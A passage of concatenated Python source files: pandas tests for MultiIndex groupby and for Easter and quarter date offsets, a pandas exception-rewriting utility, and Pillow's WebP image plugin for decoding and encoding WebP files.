grouped = s.groupby(grouper)
applied = grouped.apply(lambda x: x * 2)
expected = grouped.transform(lambda x: x * 2)
result = applied.reindex(expected.index)
tm.assert_series_equal(result, expected, check_names=False)
def test_groupby_corner(self):
midx = MultiIndex(
levels=[["foo"], ["bar"], ["baz"]],
codes=[[0], [0], [0]],
names=["one", "two", "three"],
)
df = DataFrame([np.random.rand(4)], columns=["a", "b", "c", "d"], index=midx)
# should work
df.groupby(level="three")
def test_groupby_level_no_obs(self):
# #1697
midx = MultiIndex.from_tuples(
[
("f1", "s1"),
("f1", "s2"),
("f2", "s1"),
("f2", "s2"),
("f3", "s1"),
("f3", "s2"),
]
)
df = DataFrame([[1, 2, 3, 4, 5, 6], [7, 8, 9, 10, 11, 12]], columns=midx)
df1 = df.loc(axis=1)[df.columns.map(lambda u: u[0] in ["f2", "f3"])]
grouped = df1.groupby(axis=1, level=0)
result = grouped.sum()
assert (result.columns == ["f2", "f3"]).all()
def test_setitem_with_expansion_multiindex_columns(
self, multiindex_year_month_day_dataframe_random_data
):
ymd = multiindex_year_month_day_dataframe_random_data
df = ymd[:5].T
df[2000, 1, 10] = df[2000, 1, 7]
assert isinstance(df.columns, MultiIndex)
assert (df[2000, 1, 10] == df[2000, 1, 7]).all()
def test_alignment(self):
x = Series(
data=[1, 2, 3], index=MultiIndex.from_tuples([("A", 1), ("A", 2), ("B", 3)])
)
y = Series(
data=[4, 5, 6], index=MultiIndex.from_tuples([("Z", 1), ("Z", 2), ("B", 3)])
)
res = x - y
exp_index = x.index.union(y.index)
exp = x.reindex(exp_index) - y.reindex(exp_index)
tm.assert_series_equal(res, exp)
# hit non-monotonic code path
res = x[::-1] - y[::-1]
exp_index = x.index.union(y.index)
exp = x.reindex(exp_index) - y.reindex(exp_index)
tm.assert_series_equal(res, exp)
@pytest.mark.parametrize("op", AGG_FUNCTIONS)
@pytest.mark.parametrize("level", [0, 1])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("sort", [True, False])
def test_series_group_min_max(
self, op, level, skipna, sort, series_with_multilevel_index
):
# GH 17537
ser = series_with_multilevel_index
grouped = ser.groupby(level=level, sort=sort)
# skipna=True
leftside = grouped.agg(lambda x: getattr(x, op)(skipna=skipna))
with tm.assert_produces_warning(FutureWarning):
rightside = getattr(ser, op)(level=level, skipna=skipna)
if sort:
rightside = rightside.sort_index(level=level)
tm.assert_series_equal(leftside, rightside)
@pytest.mark.parametrize("op", AGG_FUNCTIONS)
@pytest.mark.parametrize("level", [0, 1])
@pytest.mark.parametrize("axis", [0, 1])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize("sort", [True, False])
def test_frame_group_ops(
self, op, level, axis, skipna, sort, multiindex_dataframe_random_data
):
# GH 17537
frame = multiindex_dataframe_random_data
frame.iloc[1, [1, 2]] = np.nan
frame.iloc[7, [0, 1]] = np.nan
level_name = frame.index.names[level]
if axis == 0:
frame = frame
else:
frame = frame.T
grouped = frame.groupby(level=level, axis=axis, sort=sort)
pieces = []
def aggf(x):
pieces.append(x)
return getattr(x, op)(skipna=skipna, axis=axis)
leftside = grouped.agg(aggf)
with tm.assert_produces_warning(FutureWarning):
rightside = getattr(frame, op)(level=level, axis=axis, skipna=skipna)
if sort:
rightside = rightside.sort_index(level=level, axis=axis)
frame = frame.sort_index(level=level, axis=axis)
# for good measure, groupby detail
level_index = frame._get_axis(axis).levels[level].rename(level_name)
tm.assert_index_equal(leftside._get_axis(axis), level_index)
tm.assert_index_equal(rightside._get_axis(axis), level_index)
tm.assert_frame_equal(leftside, rightside)
@pytest.mark.parametrize("meth", ["var", "std"])
def test_std_var_pass_ddof(self, meth):
index = MultiIndex.from_arrays(
[np.arange(5).repeat(10), np.tile(np.arange(10), 5)]
)
df = DataFrame(np.random.randn(len(index), 5), index=index)
ddof = 4
alt = lambda x: getattr(x, meth)(ddof=ddof)
with tm.assert_produces_warning(FutureWarning):
result = getattr(df[0], meth)(level=0, ddof=ddof)
expected = df[0].groupby(level=0).agg(alt)
tm.assert_series_equal(result, expected)
with tm.assert_produces_warning(FutureWarning):
result = getattr(df, meth)(level=0, ddof=ddof)
expected = df.groupby(level=0).agg(alt)
tm.assert_frame_equal(result, expected)
def test_agg_multiple_levels(
self, multiindex_year_month_day_dataframe_random_data, frame_or_series
):
ymd = multiindex_year_month_day_dataframe_random_data
ymd = tm.get_obj(ymd, frame_or_series)
with tm.assert_produces_warning(FutureWarning):
result = ymd.sum(level=["year", "month"])
expected = ymd.groupby(level=["year", "month"]).sum()
tm.assert_equal(result, expected)
def test_groupby_multilevel(self, multiindex_year_month_day_dataframe_random_data):
ymd = multiindex_year_month_day_dataframe_random_data
result = ymd.groupby(level=[0, 1]).mean()
k1 = ymd.index.get_level_values(0)
k2 = ymd.index.get_level_values(1)
expected = ymd.groupby([k1, k2]).mean()
# TODO groupby with level_values drops names
tm.assert_frame_equal(result, expected, check_names=False)
assert result.index.names == ymd.index.names[:2]
result2 = ymd.groupby(level=ymd.index.names[:2]).mean()
tm.assert_frame_equal(result, result2)
def test_multilevel_consolidate(self):
index = MultiIndex.from_tuples(
[("foo", "one"), ("foo", "two"), ("bar", "one"), ("bar", "two")]
)
df = DataFrame(np.random.randn(4, 4), index=index, columns=index)
df["Totals", ""] = df.sum(1)
df = df._consolidate()
def test_level_with_tuples(self):
index = MultiIndex(
levels=[[("foo", "bar", 0), ("foo", "baz", 0), ("foo", "qux", 0)], [0, 1]],
codes=[[0, 0, 1, 1, 2, 2], [0, 1, 0, 1, 0, 1]],
)
series = Series(np.random.randn(6), index=index)
frame = DataFrame(np.random.randn(6, 4), index=index)
result = series[("foo", "bar", 0)]
result2 = series.loc[("foo", "bar", 0)]
expected = series[:2]
expected.index = expected.index.droplevel(0)
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
with pytest.raises(KeyError, match=r"^\(\('foo', 'bar', 0\), 2\)$"):
series[("foo", "bar", 0), 2]
result = frame.loc[("foo", "bar", 0)]
result2 = frame.xs(("foo", "bar", 0))
expected = frame[:2]
expected.index = expected.index.droplevel(0)
tm.assert_frame_equal(result, expected)
tm.assert_frame_equal(result2, expected)
index = MultiIndex(
levels=[[("foo", "bar"), ("foo", "baz"), ("foo", "qux")], [0, 1]],
codes=[[0, 0, 1, 1, 2, 2], [0, 1, 0, 1, 0, 1]],
)
series = Series(np.random.randn(6), index=index)
frame = DataFrame(np.random.randn(6, 4), index=index)
result = series[("foo", "bar")]
result2 = series.loc[("foo", "bar")]
expected = series[:2]
expected.index = expected.index.droplevel(0)
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
result = frame.loc[("foo", "bar")]
result2 = frame.xs(("foo", "bar"))
expected = frame[:2]
expected.index = expected.index.droplevel(0)
tm.assert_frame_equal(result, expected)
tm.assert_frame_equal(result2, expected)
def test_reindex_level_partial_selection(self, multiindex_dataframe_random_data):
frame = multiindex_dataframe_random_data
result = frame.reindex(["foo", "qux"], level=0)
expected = frame.iloc[[0, 1, 2, 7, 8, 9]]
tm.assert_frame_equal(result, expected)
result = frame.T.reindex(["foo", "qux"], axis=1, level=0)
tm.assert_frame_equal(result, expected.T)
result = frame.loc[["foo", "qux"]]
tm.assert_frame_equal(result, expected)
result = frame["A"].loc[["foo", "qux"]]
tm.assert_series_equal(result, expected["A"])
result = frame.T.loc[:, ["foo", "qux"]]
tm.assert_frame_equal(result, expected.T)
@pytest.mark.parametrize("d", [4, "d"])
def test_empty_frame_groupby_dtypes_consistency(self, d):
# GH 20888
        group_keys = ["a", "b", "c"]
df = DataFrame({"a": [1], "b": [2], "c": [3], "d": [d]})
g = df[df.a == 2].groupby(group_keys)
result = g.first().index
expected = MultiIndex(
levels=[[1], [2], [3]], codes=[[], [], []], names=["a", "b", "c"]
)
tm.assert_index_equal(result, expected)
def test_duplicate_groupby_issues(self):
idx_tp = [
("600809", "20061231"),
("600809", "20070331"),
("600809", "20070630"),
("600809", "20070331"),
]
dt = ["demo", "demo", "demo", "demo"]
idx = MultiIndex.from_tuples(idx_tp, names=["STK_ID", "RPT_Date"])
s = Series(dt, index=idx)
result = s.groupby(s.index).first()
assert len(result) == 3
def test_subsets_multiindex_dtype(self):
# GH 20757
data = [["x", 1]]
columns = [("a", "b", np.nan), ("a", "c", 0.0)]
df = DataFrame(data, columns=MultiIndex.from_tuples(columns))
expected = df.dtypes.a.b
result = df.a.b.dtypes
tm.assert_series_equal(result, expected)
class TestSorted:
"""everything you wanted to test about sorting"""
def test_sort_non_lexsorted(self):
# degenerate case where we sort but don't
# have a satisfying result :<
# GH 15797
idx = MultiIndex(
[["A", "B", "C"], ["c", "b", "a"]], [[0, 1, 2, 0, 1, 2], [0, 2, 1, 1, 0, 2]]
)
df = DataFrame({"col": range(len(idx))}, index=idx, dtype="int64")
assert df.index.is_monotonic is False
sorted = df.sort_index()
assert sorted.index.is_monotonic is True
expected = DataFrame(
{"col": [1, 4, 5, 2]},
index=MultiIndex.from_tuples(
[("B", "a"), ("B", "c"), ("C", "a"), ("C", "b")]
),
dtype="int64",
)
result = sorted.loc[pd.IndexSlice["B":"C", "a":"c"], :]
tm.assert_frame_equal(result, expected)
```
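Several tests above wrap sum(level=...) in assert_produces_warning(FutureWarning); a hedged sketch of the supported groupby spelling:
```python
import numpy as np
from pandas import DataFrame, MultiIndex

idx = MultiIndex.from_product([[2000, 2001], [1, 2, 3]], names=["year", "month"])
df = DataFrame({"A": np.arange(6.0)}, index=idx)
# df.sum(level="month") is deprecated; grouping on the level is the equivalent.
df.groupby(level="month").sum()
```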
#### File: tseries/offsets/test_easter.py
```python
from __future__ import annotations
from datetime import datetime
import pytest
from pandas.tests.tseries.offsets.common import (
Base,
assert_offset_equal,
)
from pandas.tseries.offsets import Easter
class TestEaster(Base):
@pytest.mark.parametrize(
"offset,date,expected",
[
(Easter(), datetime(2010, 1, 1), datetime(2010, 4, 4)),
(Easter(), datetime(2010, 4, 5), datetime(2011, 4, 24)),
(Easter(2), datetime(2010, 1, 1), datetime(2011, 4, 24)),
(Easter(), datetime(2010, 4, 4), datetime(2011, 4, 24)),
(Easter(2), datetime(2010, 4, 4), datetime(2012, 4, 8)),
(-Easter(), datetime(2011, 1, 1), datetime(2010, 4, 4)),
(-Easter(), datetime(2010, 4, 5), datetime(2010, 4, 4)),
(-Easter(2), datetime(2011, 1, 1), datetime(2009, 4, 12)),
(-Easter(), datetime(2010, 4, 4), datetime(2009, 4, 12)),
(-Easter(2), datetime(2010, 4, 4), datetime(2008, 3, 23)),
],
)
def test_offset(self, offset, date, expected):
assert_offset_equal(offset, date, expected)
```
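A two-line sketch of the offset arithmetic parametrized above:
```python
from datetime import datetime
from pandas.tseries.offsets import Easter

datetime(2010, 1, 1) + Easter()  # rolls forward to Easter 2010 (2010-04-04)
datetime(2010, 4, 5) + Easter()  # already past Easter, so 2011-04-24
```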
#### File: tseries/offsets/test_quarter.py
```python
from datetime import datetime
import pytest
from pandas.tests.tseries.offsets.common import (
Base,
assert_is_on_offset,
assert_offset_equal,
)
from pandas.tseries.offsets import (
QuarterBegin,
QuarterEnd,
)
def test_quarterly_dont_normalize():
date = datetime(2012, 3, 31, 5, 30)
offsets = (QuarterBegin, QuarterEnd)
for klass in offsets:
result = date + klass()
assert result.time() == date.time()
@pytest.mark.parametrize("offset", [QuarterBegin(), QuarterEnd()])
def test_on_offset(offset):
dates = [
datetime(2016, m, d)
for m in [10, 11, 12]
for d in [1, 2, 3, 28, 29, 30, 31]
if not (m == 11 and d == 31)
]
for date in dates:
res = offset.is_on_offset(date)
slow_version = date == (date + offset) - offset
assert res == slow_version
class TestQuarterBegin(Base):
def test_repr(self):
expected = "<QuarterBegin: startingMonth=3>"
assert repr(QuarterBegin()) == expected
expected = "<QuarterBegin: startingMonth=3>"
assert repr(QuarterBegin(startingMonth=3)) == expected
expected = "<QuarterBegin: startingMonth=1>"
assert repr(QuarterBegin(startingMonth=1)) == expected
def test_is_anchored(self):
assert QuarterBegin(startingMonth=1).is_anchored()
assert QuarterBegin().is_anchored()
assert not QuarterBegin(2, startingMonth=1).is_anchored()
def test_offset_corner_case(self):
# corner
offset = QuarterBegin(n=-1, startingMonth=1)
assert datetime(2010, 2, 1) + offset == datetime(2010, 1, 1)
offset_cases = []
offset_cases.append(
(
QuarterBegin(startingMonth=1),
{
datetime(2007, 12, 1): datetime(2008, 1, 1),
datetime(2008, 1, 1): datetime(2008, 4, 1),
datetime(2008, 2, 15): datetime(2008, 4, 1),
datetime(2008, 2, 29): datetime(2008, 4, 1),
datetime(2008, 3, 15): datetime(2008, 4, 1),
datetime(2008, 3, 31): datetime(2008, 4, 1),
datetime(2008, 4, 15): datetime(2008, 7, 1),
datetime(2008, 4, 1): datetime(2008, 7, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=2),
{
datetime(2008, 1, 1): datetime(2008, 2, 1),
datetime(2008, 1, 31): datetime(2008, 2, 1),
datetime(2008, 1, 15): datetime(2008, 2, 1),
datetime(2008, 2, 29): datetime(2008, 5, 1),
datetime(2008, 3, 15): datetime(2008, 5, 1),
datetime(2008, 3, 31): datetime(2008, 5, 1),
datetime(2008, 4, 15): datetime(2008, 5, 1),
datetime(2008, 4, 30): datetime(2008, 5, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=1, n=0),
{
datetime(2008, 1, 1): datetime(2008, 1, 1),
datetime(2008, 12, 1): datetime(2009, 1, 1),
datetime(2008, 1, 1): datetime(2008, 1, 1),
datetime(2008, 2, 15): datetime(2008, 4, 1),
datetime(2008, 2, 29): datetime(2008, 4, 1),
datetime(2008, 3, 15): datetime(2008, 4, 1),
datetime(2008, 3, 31): datetime(2008, 4, 1),
datetime(2008, 4, 15): datetime(2008, 7, 1),
datetime(2008, 4, 30): datetime(2008, 7, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=1, n=-1),
{
datetime(2008, 1, 1): datetime(2007, 10, 1),
datetime(2008, 1, 31): datetime(2008, 1, 1),
datetime(2008, 2, 15): datetime(2008, 1, 1),
datetime(2008, 2, 29): datetime(2008, 1, 1),
datetime(2008, 3, 15): datetime(2008, 1, 1),
datetime(2008, 3, 31): datetime(2008, 1, 1),
datetime(2008, 4, 15): datetime(2008, 4, 1),
datetime(2008, 4, 30): datetime(2008, 4, 1),
datetime(2008, 7, 1): datetime(2008, 4, 1),
},
)
)
offset_cases.append(
(
QuarterBegin(startingMonth=1, n=2),
{
datetime(2008, 1, 1): datetime(2008, 7, 1),
datetime(2008, 2, 15): datetime(2008, 7, 1),
datetime(2008, 2, 29): datetime(2008, 7, 1),
datetime(2008, 3, 15): datetime(2008, 7, 1),
datetime(2008, 3, 31): datetime(2008, 7, 1),
datetime(2008, 4, 15): datetime(2008, 10, 1),
datetime(2008, 4, 1): datetime(2008, 10, 1),
},
)
)
@pytest.mark.parametrize("case", offset_cases)
def test_offset(self, case):
offset, cases = case
for base, expected in cases.items():
assert_offset_equal(offset, base, expected)
class TestQuarterEnd(Base):
_offset = QuarterEnd
def test_repr(self):
expected = "<QuarterEnd: startingMonth=3>"
assert repr(QuarterEnd()) == expected
expected = "<QuarterEnd: startingMonth=3>"
assert repr(QuarterEnd(startingMonth=3)) == expected
expected = "<QuarterEnd: startingMonth=1>"
assert repr(QuarterEnd(startingMonth=1)) == expected
def test_is_anchored(self):
assert QuarterEnd(startingMonth=1).is_anchored()
assert QuarterEnd().is_anchored()
assert not QuarterEnd(2, startingMonth=1).is_anchored()
def test_offset_corner_case(self):
# corner
offset = QuarterEnd(n=-1, startingMonth=1)
assert datetime(2010, 2, 1) + offset == datetime(2010, 1, 31)
offset_cases = []
offset_cases.append(
(
QuarterEnd(startingMonth=1),
{
datetime(2008, 1, 1): datetime(2008, 1, 31),
datetime(2008, 1, 31): datetime(2008, 4, 30),
datetime(2008, 2, 15): datetime(2008, 4, 30),
datetime(2008, 2, 29): datetime(2008, 4, 30),
datetime(2008, 3, 15): datetime(2008, 4, 30),
datetime(2008, 3, 31): datetime(2008, 4, 30),
datetime(2008, 4, 15): datetime(2008, 4, 30),
datetime(2008, 4, 30): datetime(2008, 7, 31),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=2),
{
datetime(2008, 1, 1): datetime(2008, 2, 29),
datetime(2008, 1, 31): datetime(2008, 2, 29),
datetime(2008, 2, 15): datetime(2008, 2, 29),
datetime(2008, 2, 29): datetime(2008, 5, 31),
datetime(2008, 3, 15): datetime(2008, 5, 31),
datetime(2008, 3, 31): datetime(2008, 5, 31),
datetime(2008, 4, 15): datetime(2008, 5, 31),
datetime(2008, 4, 30): datetime(2008, 5, 31),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=1, n=0),
{
datetime(2008, 1, 1): datetime(2008, 1, 31),
datetime(2008, 1, 31): datetime(2008, 1, 31),
datetime(2008, 2, 15): datetime(2008, 4, 30),
datetime(2008, 2, 29): datetime(2008, 4, 30),
datetime(2008, 3, 15): datetime(2008, 4, 30),
datetime(2008, 3, 31): datetime(2008, 4, 30),
datetime(2008, 4, 15): datetime(2008, 4, 30),
datetime(2008, 4, 30): datetime(2008, 4, 30),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=1, n=-1),
{
datetime(2008, 1, 1): datetime(2007, 10, 31),
datetime(2008, 1, 31): datetime(2007, 10, 31),
datetime(2008, 2, 15): datetime(2008, 1, 31),
datetime(2008, 2, 29): datetime(2008, 1, 31),
datetime(2008, 3, 15): datetime(2008, 1, 31),
datetime(2008, 3, 31): datetime(2008, 1, 31),
datetime(2008, 4, 15): datetime(2008, 1, 31),
datetime(2008, 4, 30): datetime(2008, 1, 31),
datetime(2008, 7, 1): datetime(2008, 4, 30),
},
)
)
offset_cases.append(
(
QuarterEnd(startingMonth=1, n=2),
{
datetime(2008, 1, 31): datetime(2008, 7, 31),
datetime(2008, 2, 15): datetime(2008, 7, 31),
datetime(2008, 2, 29): datetime(2008, 7, 31),
datetime(2008, 3, 15): datetime(2008, 7, 31),
datetime(2008, 3, 31): datetime(2008, 7, 31),
datetime(2008, 4, 15): datetime(2008, 7, 31),
datetime(2008, 4, 30): datetime(2008, 10, 31),
},
)
)
@pytest.mark.parametrize("case", offset_cases)
def test_offset(self, case):
offset, cases = case
for base, expected in cases.items():
assert_offset_equal(offset, base, expected)
on_offset_cases = [
(QuarterEnd(1, startingMonth=1), datetime(2008, 1, 31), True),
(QuarterEnd(1, startingMonth=1), datetime(2007, 12, 31), False),
(QuarterEnd(1, startingMonth=1), datetime(2008, 2, 29), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 3, 30), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 3, 31), False),
(QuarterEnd(1, startingMonth=1), datetime(2008, 4, 30), True),
(QuarterEnd(1, startingMonth=1), datetime(2008, 5, 30), False),
(QuarterEnd(1, startingMonth=1), datetime(2008, 5, 31), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 6, 29), False),
(QuarterEnd(1, startingMonth=1), datetime(2007, 6, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 1, 31), False),
(QuarterEnd(1, startingMonth=2), datetime(2007, 12, 31), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 2, 29), True),
(QuarterEnd(1, startingMonth=2), datetime(2007, 3, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2007, 3, 31), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 4, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 5, 30), False),
(QuarterEnd(1, startingMonth=2), datetime(2008, 5, 31), True),
(QuarterEnd(1, startingMonth=2), datetime(2007, 6, 29), False),
(QuarterEnd(1, startingMonth=2), datetime(2007, 6, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2008, 1, 31), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 12, 31), True),
(QuarterEnd(1, startingMonth=3), datetime(2008, 2, 29), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 3, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 3, 31), True),
(QuarterEnd(1, startingMonth=3), datetime(2008, 4, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2008, 5, 30), False),
(QuarterEnd(1, startingMonth=3), datetime(2008, 5, 31), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 6, 29), False),
(QuarterEnd(1, startingMonth=3), datetime(2007, 6, 30), True),
]
@pytest.mark.parametrize("case", on_offset_cases)
def test_is_on_offset(self, case):
offset, dt, expected = case
assert_is_on_offset(offset, dt, expected)
```
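A minimal sketch of the quarterly roll-forward behavior tabulated in offset_cases above:
```python
from datetime import datetime
from pandas.tseries.offsets import QuarterBegin, QuarterEnd

datetime(2008, 2, 15) + QuarterBegin(startingMonth=1)  # 2008-04-01
datetime(2008, 2, 15) + QuarterEnd(startingMonth=1)    # 2008-04-30
```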
#### File: pandas/util/_exceptions.py
```python
from __future__ import annotations
import contextlib
import inspect
import os
@contextlib.contextmanager
def rewrite_exception(old_name: str, new_name: str):
"""
Rewrite the message of an exception.
"""
try:
yield
except Exception as err:
if not err.args:
raise
msg = str(err.args[0])
msg = msg.replace(old_name, new_name)
args: tuple[str, ...] = (msg,)
if len(err.args) > 1:
args = args + err.args[1:]
err.args = args
raise
def find_stack_level() -> int:
"""
Find the first place in the stack that is not inside pandas
(tests notwithstanding).
"""
stack = inspect.stack()
import pandas as pd
pkg_dir = os.path.dirname(pd.__file__)
test_dir = os.path.join(pkg_dir, "tests")
for n in range(len(stack)):
fname = stack[n].filename
if fname.startswith(pkg_dir) and not fname.startswith(test_dir):
continue
else:
break
return n
```
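A small usage sketch of the context manager defined above (hypothetical strings, illustrative only):
```python
from pandas.util._exceptions import rewrite_exception

try:
    with rewrite_exception("OldName", "NewName"):
        raise KeyError("OldName not found")
except KeyError as err:
    print(err)  # "'NewName not found'": the message was rewritten in place
```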
#### File: site-packages/PIL/WebPImagePlugin.py
```python
from io import BytesIO
from . import Image, ImageFile
try:
from . import _webp
SUPPORTED = True
except ImportError:
SUPPORTED = False
_VALID_WEBP_MODES = {"RGBX": True, "RGBA": True, "RGB": True}
_VALID_WEBP_LEGACY_MODES = {"RGB": True, "RGBA": True}
_VP8_MODES_BY_IDENTIFIER = {
b"VP8 ": "RGB",
b"VP8X": "RGBA",
b"VP8L": "RGBA", # lossless
}
def _accept(prefix):
is_riff_file_format = prefix[:4] == b"RIFF"
is_webp_file = prefix[8:12] == b"WEBP"
is_valid_vp8_mode = prefix[12:16] in _VP8_MODES_BY_IDENTIFIER
if is_riff_file_format and is_webp_file and is_valid_vp8_mode:
if not SUPPORTED:
return (
"image file could not be identified because WEBP support not installed"
)
return True
class WebPImageFile(ImageFile.ImageFile):
format = "WEBP"
format_description = "WebP image"
__loaded = 0
__logical_frame = 0
def _open(self):
if not _webp.HAVE_WEBPANIM:
# Legacy mode
data, width, height, self.mode, icc_profile, exif = _webp.WebPDecode(
self.fp.read()
)
if icc_profile:
self.info["icc_profile"] = icc_profile
if exif:
self.info["exif"] = exif
self._size = width, height
self.fp = BytesIO(data)
self.tile = [("raw", (0, 0) + self.size, 0, self.mode)]
self.n_frames = 1
self.is_animated = False
return
# Use the newer AnimDecoder API to parse the (possibly) animated file,
# and access muxed chunks like ICC/EXIF/XMP.
self._decoder = _webp.WebPAnimDecoder(self.fp.read())
# Get info from decoder
width, height, loop_count, bgcolor, frame_count, mode = self._decoder.get_info()
self._size = width, height
self.info["loop"] = loop_count
bg_a, bg_r, bg_g, bg_b = (
(bgcolor >> 24) & 0xFF,
(bgcolor >> 16) & 0xFF,
(bgcolor >> 8) & 0xFF,
bgcolor & 0xFF,
)
self.info["background"] = (bg_r, bg_g, bg_b, bg_a)
self.n_frames = frame_count
self.is_animated = self.n_frames > 1
self.mode = "RGB" if mode == "RGBX" else mode
self.rawmode = mode
self.tile = []
# Attempt to read ICC / EXIF / XMP chunks from file
icc_profile = self._decoder.get_chunk("ICCP")
exif = self._decoder.get_chunk("EXIF")
xmp = self._decoder.get_chunk("XMP ")
if icc_profile:
self.info["icc_profile"] = icc_profile
if exif:
self.info["exif"] = exif
if xmp:
self.info["xmp"] = xmp
# Initialize seek state
self._reset(reset=False)
def _getexif(self):
if "exif" not in self.info:
return None
return self.getexif()._get_merged_dict()
def seek(self, frame):
if not self._seek_check(frame):
return
# Set logical frame to requested position
self.__logical_frame = frame
def _reset(self, reset=True):
if reset:
self._decoder.reset()
self.__physical_frame = 0
self.__loaded = -1
self.__timestamp = 0
def _get_next(self):
# Get next frame
ret = self._decoder.get_next()
self.__physical_frame += 1
# Check if an error occurred
if ret is None:
self._reset() # Reset just to be safe
self.seek(0)
raise EOFError("failed to decode next frame in WebP file")
# Compute duration
data, timestamp = ret
duration = timestamp - self.__timestamp
self.__timestamp = timestamp
# libwebp gives frame end, adjust to start of frame
timestamp -= duration
return data, timestamp, duration
def _seek(self, frame):
if self.__physical_frame == frame:
return # Nothing to do
if frame < self.__physical_frame:
self._reset() # Rewind to beginning
while self.__physical_frame < frame:
self._get_next() # Advance to the requested frame
def load(self):
if _webp.HAVE_WEBPANIM:
if self.__loaded != self.__logical_frame:
self._seek(self.__logical_frame)
# We need to load the image data for this frame
data, timestamp, duration = self._get_next()
self.info["timestamp"] = timestamp
self.info["duration"] = duration
self.__loaded = self.__logical_frame
# Set tile
if self.fp and self._exclusive_fp:
self.fp.close()
self.fp = BytesIO(data)
self.tile = [("raw", (0, 0) + self.size, 0, self.rawmode)]
return super().load()
def tell(self):
if not _webp.HAVE_WEBPANIM:
return super().tell()
return self.__logical_frame
def _save_all(im, fp, filename):
encoderinfo = im.encoderinfo.copy()
append_images = list(encoderinfo.get("append_images", []))
# If total frame count is 1, then save using the legacy API, which
# will preserve non-alpha modes
total = 0
for ims in [im] + append_images:
total += getattr(ims, "n_frames", 1)
if total == 1:
_save(im, fp, filename)
return
background = (0, 0, 0, 0)
if "background" in encoderinfo:
background = encoderinfo["background"]
elif "background" in im.info:
background = im.info["background"]
if isinstance(background, int):
# GifImagePlugin stores a global color table index in
# info["background"]. So it must be converted to an RGBA value
palette = im.getpalette()
if palette:
r, g, b = palette[background * 3 : (background + 1) * 3]
background = (r, g, b, 255)
else:
background = (background, background, background, 255)
duration = im.encoderinfo.get("duration", im.info.get("duration", 0))
loop = im.encoderinfo.get("loop", 0)
minimize_size = im.encoderinfo.get("minimize_size", False)
kmin = im.encoderinfo.get("kmin", None)
kmax = im.encoderinfo.get("kmax", None)
allow_mixed = im.encoderinfo.get("allow_mixed", False)
verbose = False
lossless = im.encoderinfo.get("lossless", False)
quality = im.encoderinfo.get("quality", 80)
method = im.encoderinfo.get("method", 0)
icc_profile = im.encoderinfo.get("icc_profile") or ""
exif = im.encoderinfo.get("exif", "")
if isinstance(exif, Image.Exif):
exif = exif.tobytes()
xmp = im.encoderinfo.get("xmp", "")
if allow_mixed:
lossless = False
# Sensible keyframe defaults are from gif2webp.c script
if kmin is None:
kmin = 9 if lossless else 3
if kmax is None:
kmax = 17 if lossless else 5
# Validate background color
if (
not isinstance(background, (list, tuple))
or len(background) != 4
or not all(v >= 0 and v < 256 for v in background)
):
raise OSError(
"Background color is not an RGBA tuple clamped to (0-255): %s"
% str(background)
)
# Convert to packed uint
bg_r, bg_g, bg_b, bg_a = background
background = (bg_a << 24) | (bg_r << 16) | (bg_g << 8) | (bg_b << 0)
# Setup the WebP animation encoder
enc = _webp.WebPAnimEncoder(
im.size[0],
im.size[1],
background,
loop,
minimize_size,
kmin,
kmax,
allow_mixed,
verbose,
)
# Add each frame
frame_idx = 0
timestamp = 0
cur_idx = im.tell()
try:
for ims in [im] + append_images:
# Get # of frames in this image
nfr = getattr(ims, "n_frames", 1)
for idx in range(nfr):
ims.seek(idx)
ims.load()
# Make sure image mode is supported
frame = ims
rawmode = ims.mode
if ims.mode not in _VALID_WEBP_MODES:
alpha = (
"A" in ims.mode
or "a" in ims.mode
or (ims.mode == "P" and "A" in ims.im.getpalettemode())
)
rawmode = "RGBA" if alpha else "RGB"
frame = ims.convert(rawmode)
if rawmode == "RGB":
# For faster conversion, use RGBX
rawmode = "RGBX"
# Append the frame to the animation encoder
enc.add(
frame.tobytes("raw", rawmode),
timestamp,
frame.size[0],
frame.size[1],
rawmode,
lossless,
quality,
method,
)
# Update timestamp and frame index
if isinstance(duration, (list, tuple)):
timestamp += duration[frame_idx]
else:
timestamp += duration
frame_idx += 1
finally:
im.seek(cur_idx)
# Force encoder to flush frames
enc.add(None, timestamp, 0, 0, "", lossless, quality, 0)
# Get the final output from the encoder
data = enc.assemble(icc_profile, exif, xmp)
if data is None:
raise OSError("cannot write file as WebP (encoder returned None)")
fp.write(data)
def _save(im, fp, filename):
lossless = im.encoderinfo.get("lossless", False)
quality = im.encoderinfo.get("quality", 80)
icc_profile = im.encoderinfo.get("icc_profile") or ""
exif = im.encoderinfo.get("exif", "")
if isinstance(exif, Image.Exif):
exif = exif.tobytes()
xmp = im.encoderinfo.get("xmp", "")
method = im.encoderinfo.get("method", 4)
if im.mode not in _VALID_WEBP_LEGACY_MODES:
alpha = (
"A" in im.mode
or "a" in im.mode
or (im.mode == "P" and "transparency" in im.info)
)
im = im.convert("RGBA" if alpha else "RGB")
data = _webp.WebPEncode(
im.tobytes(),
im.size[0],
im.size[1],
lossless,
float(quality),
im.mode,
icc_profile,
method,
exif,
xmp,
)
if data is None:
raise OSError("cannot write file as WebP (encoder returned None)")
fp.write(data)
Image.register_open(WebPImageFile.format, WebPImageFile, _accept)
if SUPPORTED:
Image.register_save(WebPImageFile.format, _save)
if _webp.HAVE_WEBPANIM:
Image.register_save_all(WebPImageFile.format, _save_all)
Image.register_extension(WebPImageFile.format, ".webp")
